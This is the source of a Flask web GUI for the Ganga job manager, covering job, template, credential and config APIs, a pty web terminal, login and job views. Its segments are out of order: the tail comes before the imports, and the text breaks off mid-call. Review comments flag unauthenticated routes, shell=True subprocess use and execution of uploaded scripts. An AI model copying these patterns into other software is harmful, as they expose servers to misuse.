        response_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/copy", "put")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(response_info)
# ******************** Jobs API ******************** #

# Jobs API - GET Method
@gui.route("/api/jobs", methods=["GET"])
@token_required
def jobs_endpoint(current_api_user):
    """
    Returns a list of jobs with general information in JSON format.
    The parameter accepted are:
        * ids: provide a JSON string of list of IDs
        * status: provide job status as a string for filter
        * application: provide job application as a string for filter
        * backend: provide backend application as a string for filter
        * recent: if provided, starts a list from recent job to old
        * length: number of job to be returned, provide as a int
        * offset: how many job to skip before returning the specified length of job. Provide as int.
            offset works like: number of job skipped = offset * length
        * auto-validate-ids: If ids provided in ids parameters does not exist in job repository, then skip those ids.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # Forward the supported filter/pagination options from the query string
    params = {
        "ids": request.args.get("ids"),
        "status": request.args.get("status"),
        "application": request.args.get("application"),
        "backend": request.args.get("backend"),
        "recent": request.args.get("recent"),
        "length": request.args.get("length"),
        "offset": request.args.get("offset"),
        "auto-validate-ids": request.args.get("auto-validate-ids")
    }
    try:
        # Get jobs information according to select filter and range filter
        # (was a pointless f-string with no placeholder; plain literal now)
        jobs_info = query_internal_api("/internal/jobs", "get", params=params)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(jobs_info)
# Jobs statistics API - GET Method
@gui.route("/api/jobs/statistics", methods=["GET"])
@token_required
def jobs_statistics_endpoint(current_api_user):
    """
    Returns the number of jobs in new, running, completed, killed, failed status.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Per-status job counts from the internal API
        statistics = query_internal_api("/internal/jobs/statistics", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(statistics)
@gui.route("/api/queue", methods=["GET"])
@token_required
def queue_endpoint(current_api_user):
    """
    Return information about the Ganga worker queues in JSON format.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Queue state from the internal API
        queue_info = query_internal_api("/internal/queue", "get")
    except Exception as err:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(queue_info)
@gui.route("/api/queue/chart", methods=["GET","POST"])
def queue_chart_endpoint():
    """
    Return queue data used by the frontend chart as a JSON payload.
    NOTE(review): unlike the sibling /api routes this endpoint is NOT protected
    by @token_required — confirm this is intentional (e.g. polled by the
    dashboard chart without a token) before exposing the server.
    """
    try:
        chart_info = query_internal_api("/internal/queue/data", "get")
    except Exception as err:
        # Previously an internal-API failure here surfaced as an unhandled 500;
        # report it like the other API endpoints do.
        return jsonify({"success": False, "message": str(err)}), 400
    response = make_response(json.dumps(chart_info))
    response.content_type = 'application/json'
    return response
# Job incomplete ids API - GET Method
@gui.route("/api/jobs/incomplete_ids", methods=["GET"])
@token_required
def jobs_incomplete_ids_endpoint(current_api_user):
    """
    Returns a list of incomplete job ids in JSON format.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # IDs of jobs the repository could not fully load
        incomplete_ids_list = query_internal_api("/internal/jobs/incomplete-ids", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(incomplete_ids_list)
# ******************** Config API ******************** #

# Config API - GET Method
@gui.route("/api/config", methods=["GET"], defaults={"section": ""})
@gui.route("/api/config/<section>", methods=["GET"])
@token_required
def config_endpoint(current_api_user, section: str):
    """
    Returns a list of all the section of the configuration and their options as well as the values in JSON format.
    If section is provide, returns information about the section in JSON format.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # Query the whole configuration, or just one section when requested
    endpoint = f"/internal/config/{section}" if section != "" else "/internal/config"
    try:
        config_info = query_internal_api(endpoint, "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(config_info)
# ******************** Templates API ******************** #

# Templates API - GET Method
@gui.route("/api/templates", methods=["GET"])
@token_required
def templates_endpoint(current_api_user):
    """
    Return a JSON list of template-info objects.

    Supported query parameters (all optional, all forwarded as-is):
    * application: filter by template application name
    * backend: filter by template backend name
    * recent: if provided, order from most recent template to oldest
    * length: number of templates to return (int)
    * offset: number of pages of `length` templates to skip (int);
      templates skipped = offset * length

    :param current_api_user: user record resolved from the request's JWT token
    """
    # Forward only the filters this route actually supports
    filter_names = ("application", "backend", "recent", "length", "offset")
    params = {name: request.args.get(name) for name in filter_names}
    try:
        templates_info = query_internal_api("/internal/templates", "get", params=params)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(templates_info)
# Single template full print API - GET Method
@gui.route("/api/templates/<int:template_id>/full-print", methods=["GET"])
@token_required
def template_full_print_endpoint(current_api_user, template_id: int):
    """
    Return the full print of a single template.

    :param current_api_user: user record resolved from the request's JWT token
    :param template_id: int - id of the template to print
    """
    try:
        # Fetch the template's full print from the internal server
        printed = query_internal_api(f"/internal/templates/{template_id}/full-print", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(printed)
# Template API - DELETE Method
@gui.route("/api/templates/<int:template_id>", methods=["DELETE"])
@token_required
def delete_template_endpoint(current_api_user, template_id: int):
    """
    Delete the given template from the template repository.

    :param current_api_user: user record resolved from the request's JWT token
    :param template_id: int - id of the template to delete
    """
    try:
        # Ask the internal server to remove the template
        result = query_internal_api(f"/internal/templates/{template_id}", "delete")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# ******************** Credentials API ******************** #

# Credential store API - GET Method
@gui.route("/api/credentials", methods=["GET"])
@token_required
def credentials_endpoint(current_api_user):
    """
    Return the credential store contents (one info dict per credential) as JSON.

    :param current_api_user: user record resolved from the request's JWT token
    """
    try:
        creds = query_internal_api("/internal/credentials", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(creds)
# Credential Store API - PUT Method - Renew all credentials
@gui.route("/api/credentials/renew", methods=["PUT"])
@token_required
def credentials_renew_endpoint(current_api_user):
    """
    Renew every credential in the credential store.

    :param current_api_user: user record resolved from the request's JWT token
    """
    try:
        # Ask the internal server to renew all credentials
        renew_result = query_internal_api("/internal/credentials/renew", "put")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(renew_result)
# ******************** Job Tree API ******************** #

# Job tree API - GET Method
@gui.route("/api/jobtree", methods=["GET"])
@token_required
def jobtree_endpoint(current_api_user):
    """
    Return the job tree folder structure as a JSON-encoded dict.

    :param current_api_user: user record resolved from the request's JWT token
    """
    try:
        tree = query_internal_api("/internal/jobtree", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(tree)
# ******************** Plugins API ******************** #
# Plugins API - GET Method
@gui.route("/api/plugins", methods=["GET"])
@token_required
def plugins_endpoint(current_api_user):
    """
    Return plugin information: each category and the plugin names within it.

    :param current_api_user: user record resolved from the request's JWT token
    """
    try:
        plugin_data = query_internal_api("/internal/plugins", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(plugin_data)
# Plugin API - GET Method
@gui.route("/api/plugins/<plugin_name>", methods=["GET"])
@token_required
def plugin_endpoint(current_api_user, plugin_name: str):
    """
    Return information (name and docstring) for a single plugin.

    :param current_api_user: user record resolved from the request's JWT token
    :param plugin_name: str - name of the plugin to look up
    """
    try:
        plugin_data = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(plugin_data)
# ******************** Helper Functions ******************** #

# Validate uploaded filename.
def allowed_file(filename):
    """Return True when *filename* has an extension listed in ALLOWED_EXTENSIONS."""
    _, dot, extension = filename.rpartition(".")
    return bool(dot) and extension.lower() in ALLOWED_EXTENSIONS
# Make HTTP request to the Internal Flask Server which is running on a GangaThread which has access to ganga namespace.
def query_internal_api(route: str, method: str, **kwargs):
    """
    Query the internal API Flask server (running on a GangaThread) for Ganga data.

    :param route: str - internal API route, e.g. "/internal/jobs"
    :param method: str - one of "get", "post", "put", "delete"
    :param kwargs: dict - forwarded to the requests call (params, json, ...)
    :return: dict - decoded JSON body of a successful (HTTP 200) response
    :raises Exception: for an unsupported method or a non-200 response
    """
    # Internal url for communicating with API server running on a GangaThread
    base_url = f"http://localhost:{gui.config['INTERNAL_PORT']}"
    if method not in ("get", "post", "put", "delete"):
        raise Exception(f"Unsupported method: {method}")
    # Dispatch to requests.get / requests.post / ... with the given arguments
    response = getattr(requests, method)(base_url + route, **kwargs)
    # Anything other than 200 carries an error message in its JSON body
    if response.status_code != 200:
        raise Exception(response.json().get("message"))
    return response.json()
def create_session_defaults():
    """
    Populate the user session with default pagination and filter values
    for the templates, jobs and subjobs views (only where missing).
    """
    defaults = {
        "templates_per_page": 10,
        "templates_filter": {key: "any" for key in ["application", "backend"]},
        "jobs_per_page": 10,
        "jobs_filter": {key: "any" for key in ["status", "application", "backend"]},
        "subjobs_per_page": 10,
        "subjobs_filter": {key: "any" for key in ["status", "application", "backend"]},
    }
    # Never overwrite values the user has already customised
    for name, value in defaults.items():
        if name not in session:
            session[name] = value
# Ping internal API server
def ping_internal():
    """
    Poll the internal API server's /ping route until it answers.

    Retries every 2 seconds; gives up after more than 20 unsuccessful rounds
    (~40 seconds).

    :return: True once /ping answers True, False when the retry budget is spent
    """
    trials = 0
    while True:
        try:
            if query_internal_api("/ping", "get") is True:
                return True
        # BUGFIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt while waiting for the server.
        except Exception:
            # Server not up yet (usually because Ganga is still booting)
            print("Internal API server not online (mostly because Ganga is booting up), retrying...")
        # BUGFIX: the retry counter and sleep used to live inside the except
        # block only, so a non-True /ping response span a tight infinite loop.
        time.sleep(2)
        trials += 1
        if trials > 20:
            return False
def start_ganga(internal_port: int, args: str = ""):
    """
    Start a Ganga session in a pseudo terminal (pty).

    Forks this process: the child runs ``ganga --webgui`` through a shell,
    the parent stores the pty file descriptor and the child's PID in the
    Flask config so other parts of the GUI can drive the terminal.

    :param internal_port: int - port the internal API server will listen on
    :param args: str - extra command line arguments appended verbatim to ganga
    """
    # Create child process attached to a pty that we can read from and write to
    (child_pid, fd) = pty.fork()
    if child_pid == 0:
        # Child fork: anything printed here shows up in the pty, including the output of this subprocess
        ganga_env = os.environ.copy()
        ganga_env["WEB_CLI"] = "True"
        ganga_env["INTERNAL_PORT"] = str(internal_port)
        # NOTE(review): shell=True interpolates `args` into the command line.
        # `args` comes from server-side config (GANGA_ARGS), not request data —
        # confirm it can never carry untrusted input.
        subprocess.run(f"ganga --webgui {args}", shell=True, env=ganga_env)
    else:
        # Parent fork: keep fd (connected to the child's controlling terminal) and the child pid
        gui.config["FD"] = fd
        gui.config["CHILD_PID"] = child_pid
        # Give the terminal an initial 50x50 geometry; the frontend resizes it later
        set_windowsize(fd, 50, 50)
        print("Ganga started, PID: ", child_pid)
# Set the window size of the pseudo terminal according to the size in the frontend
def set_windowsize(fd, row, col, xpix=0, ypix=0):
    """
    Apply a window size of *row* x *col* (plus optional pixel sizes) to the
    pty behind file descriptor *fd* via the TIOCSWINSZ ioctl.
    """
    geometry = struct.pack("HHHH", row, col, xpix, ypix)
    fcntl.ioctl(fd, termios.TIOCSWINSZ, geometry)
# Read and forward that data from the pseudo terminal to the frontend
def read_and_forward_pty_output():
    """
    Service loop: forward Ganga terminal output to the browser.

    Runs forever; every 10 ms it polls the stored pty file descriptor with a
    non-blocking select() and emits any available output on the "pty-output"
    socket.io event in the "/pty" namespace.
    """
    max_read_bytes = 1024 * 20
    while True:
        # Cooperative sleep so other socketio green-threads can run
        socketio.sleep(0.01)
        if gui.config["FD"]:
            # timeout 0 -> pure poll, never blocks the loop
            timeout_sec = 0
            (data_ready, _, _) = select.select([gui.config["FD"]], [], [], timeout_sec)
            if data_ready:
                output = os.read(gui.config["FD"], max_read_bytes).decode()
                socketio.emit("pty-output", {"output": output}, namespace="/pty")
def start_web_cli(host: str, port: int, internal_port: int, log_output=True, ganga_args: str = ""):
    """
    Start the web server on eventlet serving the terminal on the specified
    port. (Production ready server.)

    :param host: str - interface to bind
    :param port: int - public GUI port
    :param internal_port: int - port of the internal API server
    :param log_output: bool - forwarded to socketio.run
    :param ganga_args: str - arguments to be passed to ganga
    """
    from GangaGUI.start import create_default_user

    # Create default user
    gui_user, gui_password = create_default_user()
    print(f"Starting the GUI server on http://{host}:{port}")
    # BUGFIX: message previously read "You login information"
    print(f"Your login information for the GUI is: Username: {gui_user.user} Password: {gui_password}")
    gui.config["INTERNAL_PORT"] = internal_port
    gui.config["WEB_CLI"] = True
    gui.config["GANGA_ARGS"] = ganga_args
    socketio.run(gui, host=host, port=port, log_output=log_output)  # TODO
# ******************** Shutdown Function ******************** #

# Route used to shutdown the Internal API server and GUI server
@gui.route("/shutdown", methods=["GET"])
def shutdown():
    """
    Shut down the internal API server and report success.

    Refused in WEB CLI mode, where the server must be stopped manually.
    """
    if gui.config["WEB_CLI"] is True:
        flash("WEB CLI Mode is on, cannot self shutdown server. Consider doing manually.", "warning")
        return redirect(url_for("dashboard"))
    try:
        query_internal_api("/shutdown", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return "GUI Shutdown Successful."
# ******************** EOF ******************** #
import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename, safe_join
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, session, send_file, make_response
from flask_login import login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
# ******************** Initialisation of Flask App for GUI ******************** #
# GUI Flask App; configuration is loaded from the Config object in ./config.py
gui = Flask(__name__)
gui.config.from_object(Config)
# Database object which is used to interact with the "gui.sqlite" in gangadir/gui folder
# NOTE: IT HAS NO RELATION WITH THE GANGA PERSISTENT DATABASE
db = SQLAlchemy(gui)
# Login manager for the view routes: unauthenticated users hitting a
# @login_required view are redirected to the "login" endpoint with this message.
login = LoginManager(gui)
login.login_view = "login"
login.login_message = "Please Login to Access this Page."
login.login_message_category = "warning"
# Websocket support (socket.io), used to stream the terminal between frontend and backend
socketio = SocketIO(gui)
# ******************** The user class for database and authentication ******************** #

# ORM Class to represent Users - used to access the GUI & API resources
class User(UserMixin, db.Model):
    """GUI user account stored in gangadir/gui "gui.sqlite" (NOT the Ganga repository DB)."""

    __tablename__ = "users"
    id = db.Column(db.Integer, primary_key=True)
    # Opaque identifier embedded in JWTs instead of the primary key
    public_id = db.Column(db.String(64), unique=True)
    user = db.Column(db.String(32), unique=True)
    password_hash = db.Column(db.String(64))
    role = db.Column(db.String(32))
    # JSON-encoded list of job ids pinned on the dashboard
    pinned_jobs = db.Column(db.Text)

    def store_password_hash(self, password: str):
        """Hash *password* and store it; the plaintext is never persisted."""
        self.password_hash = generate_password_hash(password)

    def verify_password(self, password: str) -> bool:
        """Return True when *password* matches the stored hash."""
        return check_password_hash(self.password_hash, password)

    def generate_auth_token(self, expires_in_days: int = 5) -> str:
        """
        Return a signed JWT carrying the user's public id.

        BUGFIX: the expiry is now computed from a timezone-aware UTC time;
        datetime.utcnow() is naive and deprecated in recent Python versions.

        :param expires_in_days: int - token lifetime in days (default 5)
        """
        expiry = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=expires_in_days)
        return jwt.encode(
            {"public_id": self.public_id, "exp": expiry},
            gui.config["SECRET_KEY"], algorithm="HS256")

    def __repr__(self):
        return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
# User Loader Function for Flask Login
@login.user_loader
def load_user(user_id):
    """
    Flask-Login callback: map the session-stored user id to its User row.

    :param user_id: user id as stored in the session cookie (stringified int)
    :return: User instance, or None when the id is unknown
    """
    return User.query.get(int(user_id))
# ******************** Global Variables ******************** #
# Bootstrap CSS context color used to render each job status in the GUI
status_color = {
    "new": "info",
    "completed": "success",
    "completed_frozen" : "success",
    "failed": "danger",
    "failed_frozen" : "danger",
    "running": "primary",
    "submitted": "secondary",
    "killed": "warning"
}
# Allowed extensions when uploading any files to GUI
ALLOWED_EXTENSIONS = {"txt", "py"}
# Job actions and plugin information, fetched once from Ganga in initial_run()
# and reused by the view routes below.
actions = {}
plugins = {}
# ******************** Run Before First Request ******************** #

# Execute before first request
@gui.before_first_request
def initial_run():
    """
    One-time setup before the first request is served.

    Starts a Ganga session when WEB_CLI mode is on, resets any stale login,
    seeds session defaults, waits for the internal API server, and caches the
    job actions / plugins data used by the view routes.
    """
    global actions, plugins
    # Start ganga if WEB_CLI mode is True
    if gui.config['WEB_CLI'] is True:
        start_ganga(gui.config['INTERNAL_PORT'], args=gui.config["GANGA_ARGS"])
        session["WEB_CLI"] = True
    elif gui.config['INTERNAL_PORT'] is None:
        # Not in WEB_CLI mode and no configured port: fall back to the environment
        gui.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
    # If user is authenticated, log them out. This happens after a fresh start of the GUI server.
    if current_user.is_authenticated:
        logout_user()
    # Create user session defaults
    create_session_defaults()
    # Check if internal server is online, exit after 20s of retrying
    if not ping_internal():
        print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
        sys.exit(1)
    # Get job actions and plugins information from ganga
    try:
        # Get actions and plugins data once; the routes read the module globals
        actions = query_internal_api("/internal/jobs/actions", "get")
        plugins = query_internal_api("/internal/plugins", "get")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
# ******************** View Routes ******************** #

# Login View
@gui.route("/login", methods=["GET", "POST"])
def login():
    """
    Render the login page and authenticate users posted from it.

    NOTE(review): this view function shadows the module-level LoginManager
    instance also named `login` — confirm nothing relies on that name later.
    """
    # Already logged-in users go straight to the dashboard
    if current_user.is_authenticated:
        return redirect(url_for("dashboard"))
    if request.method == "POST":
        username = request.form.get("username")
        password = request.form.get("password")
        # Look the account up and check the submitted password
        account = User.query.filter_by(user=username).first()
        if account and account.verify_password(password):
            login_user(account, True)
            flash("Login successful", "success")
            return redirect(url_for("dashboard"))
        flash("Error identifying the user", "danger")
    # GET (or failed POST): show the login form with the known users
    return render_template("login.html", title="Login", users=User.query.all())
# Logout View
@gui.route("/logout", methods=["GET"])
def logout():
    """
    Log the current user out of the GUI and return to the login page.
    """
    # logout_user() is only meaningful for an authenticated session
    if current_user.is_authenticated:
        logout_user()
    return redirect(url_for("login"))
# Dashboard view
@gui.route("/")
@login_required
def dashboard():
    """
    Render the dashboard: overall statistics, the ten most recent jobs,
    and the current user's pinned jobs.
    """
    quick_statistics = {}
    recent_jobs_info = []
    pinned_jobs_info = []
    try:
        quick_statistics = query_internal_api("/internal/jobs/statistics", "get")
        recent_jobs_info = query_internal_api("/internal/jobs/recent", "get")
        # Pinned jobs are stored per-user as a JSON id list; fall back to []
        pinned = current_user.pinned_jobs
        pinned_jobs_info = query_internal_api("/internal/jobs", "get", params={
            "ids": pinned if pinned is not None else json.dumps([]),
            "auto-validate-ids": True})
    except Exception as exc:
        # Surface the error in the GUI but still render the page
        flash(str(exc), "danger")
    return render_template("dashboard.html",
                           title="Dashboard",
                           quick_statistics=quick_statistics,
                           recent_jobs_info=recent_jobs_info,
                           pinned_jobs_info=pinned_jobs_info,
                           status_color=status_color)
# Config view
@gui.route("/config", methods=["GET", "POST"])
@login_required
def config_page():
    """
    Display the Ganga configuration, optionally narrowed to one section
    selected through the page's form.
    """
    full_config_info = []
    config_info = []
    section = None
    if request.method == "POST":
        # A specific section was requested through the form
        requested = request.form.get("section")
        section = requested if requested not in ["", None] else None
    try:
        full_config_info = query_internal_api("/internal/config", "get")
        # Narrow to the requested section, or show everything
        if section is None:
            config_info = full_config_info
        else:
            config_info = [s for s in full_config_info if s["name"] == section]
    except Exception as exc:
        flash(str(exc), "danger")
    return render_template("config.html", title="Config", full_config_info=full_config_info, config_info=config_info)
# Edit gangarc
@gui.route("/config_edit", methods=["GET", "POST"])
@login_required
def edit_config_page():
    """
    View and edit the .gangarc file from the GUI.

    GET shows the current file contents; POST overwrites the file with the
    submitted editor text and redisplays what was written.
    """
    gui_rc = gui.config["GANGA_RC"]
    if request.method == 'POST':
        # Overwrite .gangarc with the text submitted from the editor
        config_ganga = request.form['config-data']
        with open(gui_rc, 'w') as f1:
            f1.write(str(config_ganga))
        flash(".gangarc Edited", "success")
    # Single read for display (re-read after a write); the original opened
    # and read the file up to three times per request.
    with open(gui_rc, "rt") as f:
        ganga_config = f.read()
    return render_template("config_edit.html", title="Edit gangarc", ganga_config=ganga_config)
# Create view
@gui.route("/create", methods=["GET", "POST"])
@login_required
def create_page():
    """
    Handle the create page: load a job from an uploaded file, run an uploaded
    script, or show recent templates to create a job from.

    BUGFIX: @login_required used to sit ABOVE @gui.route. Decorators apply
    bottom-up, so the route was registered with the unguarded function and
    /create required no login. The route decorator must be outermost.
    """
    if request.method == "POST":
        # Load a job from an uploaded file via the GPI load() function
        if "loadfile" in request.files:
            loadfile = request.files["loadfile"]
            if loadfile.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            # If valid file, save it and ask the internal server to load it
            if loadfile and allowed_file(loadfile.filename):
                save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
                loadfile.save(save_path)
                try:
                    response_info = query_internal_api("/internal/load", "get", params={"path": save_path})
                except Exception as err:
                    flash(str(err), "danger")
                    return redirect(request.url)
                flash(response_info.get("message"), "success")
                return redirect(request.url)
        # Run an uploaded script via the GPI runfile() function
        if "runfile" in request.files:
            runfile = request.files["runfile"]
            if runfile.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            # If valid file, save it and ask the internal server to run it
            if runfile and allowed_file(runfile.filename):
                save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
                runfile.save(save_path)
                try:
                    response_info = query_internal_api("/internal/runfile", "get", params={"path": save_path})
                except Exception as err:
                    flash(str(err), "danger")
                    return redirect(request.url)
                flash(response_info.get("message"), "success")
                return redirect(request.url)
        # Neither upload field was usable
        flash("No file, retry!", "warning")
        return redirect(request.url)
    # GET: show the six most recent templates
    try:
        templates_info = query_internal_api("/internal/templates", "get",
                                            params={"recent": True, "length": "6"})
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    return render_template("create.html", title="Create", templates_info=templates_info)
# Runfile view
@gui.route("/create/runfile", methods=["GET", "POST"])
@login_required
def runfile_page():
    """
    Edit and execute a quick script through the GPI runfile function.
    """
    # Location where the editor contents are persisted before running
    runfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
    if request.method == "POST":
        # Persist the editor contents, then ask the internal server to run them
        with open(runfile_path, "w+") as f:
            f.write(request.form.get("runfile-data"))
        try:
            response_info = query_internal_api("/internal/runfile", "get", params={"path": runfile_path})
            flash(response_info["message"], "success")
        except Exception as exc:
            flash(str(exc), "danger")
        return redirect(request.url)
    return render_template("runfile.html", title="Runfile")
# Templates view
@gui.route("/templates", methods=["GET", "POST"])
@login_required
def templates_page():
    """
    Tabular, paginated view of the stored templates.
    """
    if request.method == "POST":
        # Persist the submitted filter/pagination choices in the session
        session["templates_per_page"] = int(request.form.get("templates-per-page"))
        session["templates_filter"] = {
            "application": request.form.get("template-application"),
            "backend": request.form.get("template-backend"),
        }
    # Requested page number (defaults to the first page)
    page_arg = request.args.get("page")
    current_page = int(page_arg) if page_arg is not None else 0
    templates_per_page = session["templates_per_page"]
    try:
        templates_length = query_internal_api("/internal/templates/length", "get",
                                              params=session["templates_filter"])
        number_of_pages = (int(templates_length) // int(templates_per_page)) + 1
        # Clamp requests past the end to the last page
        if current_page >= number_of_pages:
            return redirect(url_for("templates_page", page=number_of_pages - 1))
        # Filters plus range options for the actual data query
        params = dict(session["templates_filter"],
                      recent=True, length=templates_per_page, offset=current_page)
        templates_info = query_internal_api("/internal/templates", "get", params=params)
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("create_page"))
    return render_template("templates.html",
                           title="Templates",
                           number_of_pages=number_of_pages,
                           current_page=current_page,
                           backends=plugins["backends"],
                           applications=plugins["applications"],
                           templates_info=templates_info)
# Jobs view
@gui.route("/jobs", methods=["GET", "POST"])
@login_required
def jobs_page():
    """
    Tabular, paginated view of the jobs in the repository.
    """
    if request.method == "POST":
        # Persist the submitted filter/pagination choices in the session
        session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
        session["jobs_filter"] = {
            "status": request.form.get("job-status"),
            "application": request.form.get("job-application"),
            "backend": request.form.get("job-backend"),
        }
    # Requested page number (defaults to the first page)
    page_arg = request.args.get("page")
    current_page = int(page_arg) if page_arg is not None else 0
    jobs_per_page = session["jobs_per_page"]
    try:
        jobs_length = query_internal_api("/internal/jobs/length", "get", params=session["jobs_filter"])
        number_of_pages = (int(jobs_length) // int(jobs_per_page)) + 1
        # Clamp requests past the end to the last page
        if current_page >= number_of_pages:
            return redirect(url_for("jobs_page", page=number_of_pages - 1))
        # Filters plus range options for the actual data query
        params = dict(session["jobs_filter"],
                      recent=True, length=jobs_per_page, offset=current_page)
        jobs_info = query_internal_api("/internal/jobs", "get", params=params)
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template("jobs.html",
                           title="Jobs",
                           jobs_info=jobs_info,
                           backends=plugins["backends"],
                           applications=plugins["applications"],
                           number_of_pages=number_of_pages,
                           current_page=current_page,
                           status_color=status_color)
# Job view
@gui.route('/jobs/<int:job_id>')
@login_required
def job_page(job_id: int):
    """
    Detailed view of a single job, including its stdout/stderr when present.

    :param job_id: int
    """
    stdout = None
    stderr = None
    try:
        job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
        # Read stdout/stderr from the job output directory when available
        streams = {}
        for stream in ("stdout", "stderr"):
            stream_path = os.path.join(job_info["outputdir"], stream)
            if os.path.exists(stream_path):
                with open(stream_path) as f:
                    streams[stream] = f.read()
        stdout = streams.get("stdout")
        stderr = streams.get("stderr")
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("jobs_page"))
    return render_template("job.html",
                           title=f"Job {job_id}",
                           job_info=job_info,
                           status_color=status_color,
                           attribute_actions=actions.get("attributes"),
                           method_actions=actions.get("methods"),
                           stdout=stdout,
                           stderr=stderr,
                           full_print_info=full_print_info)
# Export job
@gui.route("/jobs/<int:job_id>/export")
@login_required
def job_export(job_id: int):
    """
    Export the job via the GPI export function and send the resulting file.

    :param job_id: int
    """
    # Path the internal API writes the exported job text to
    # (was a pointless f-string literal with no placeholders)
    export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
    try:
        # Ask the internal server to export the job to export_path;
        # the response body itself is not needed (unused variable removed)
        query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
        return send_file(export_path, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{job_id}.txt")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("job_page", job_id=job_id))
# Edit job
@gui.route("/jobs/<int:job_id>/edit", methods=["GET", "POST"])
@login_required
def job_edit(job_id: int):
    """
    Show the exported job text for editing; submitting the edited text
    loads it as a new job.

    :param job_id: int
    """
    loadfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
    export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
    if request.method == "POST":
        # Write the edited text, then load it as a new job through the GPI
        with open(loadfile_path, "w+") as f:
            f.write(request.form.get("edited-job-info"))
        try:
            response_info = query_internal_api("/internal/load", "get", params={"path": loadfile_path})
            flash(response_info["message"], "success")
        except Exception as exc:
            flash(str(exc), "danger")
        return redirect(request.url)
    try:
        # Export the job and read the text back for display in the editor
        query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
        with open(export_path) as f:
            exported_data = f.read()
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    return render_template("edit_job.html", title=f"Edit Job {job_id}", job_id=job_id, exported_data=exported_data)
# Browse job directory
@gui.route("/job/<int:job_id>/browse", defaults={"path": ""})
@gui.route("/job/<int:job_id>/browse/<path:path>")
@login_required
def job_browse(job_id: int, path):
    """
    Browse the output directory tree of a job; sends the file when *path*
    names a file.

    :param job_id: int
    :param path: str - path relative to the job's base directory
    """
    try:
        job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
        # Base directory of the job (two levels above its output dir)
        job_base_dir = os.path.dirname(os.path.dirname(job_info["outputdir"]))
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    # safe_join rejects path traversal outside job_base_dir; on older
    # Werkzeug it signals that by returning None (newer versions raise),
    # which previously crashed in os.path.dirname(None). Treat as not found.
    abs_path = safe_join(job_base_dir, path)
    if abs_path is None or not os.path.exists(abs_path):
        flash("Directory for this job does not exist.", "warning")
        return redirect(url_for("job_page", job_id=job_id))
    # URL path variable for the "back" link
    back_path = os.path.dirname(abs_path).replace(job_base_dir, "")
    # A file is sent directly
    if os.path.isfile(abs_path):
        return send_file(abs_path)
    # A directory is listed with a directory/file flag per entry
    files_info = [{
        "file": entry,
        "directory": os.path.isdir(os.path.join(abs_path, entry))
    } for entry in os.listdir(abs_path)]
    return render_template('job_dir.html', title=f"Job {job_id} Directory",
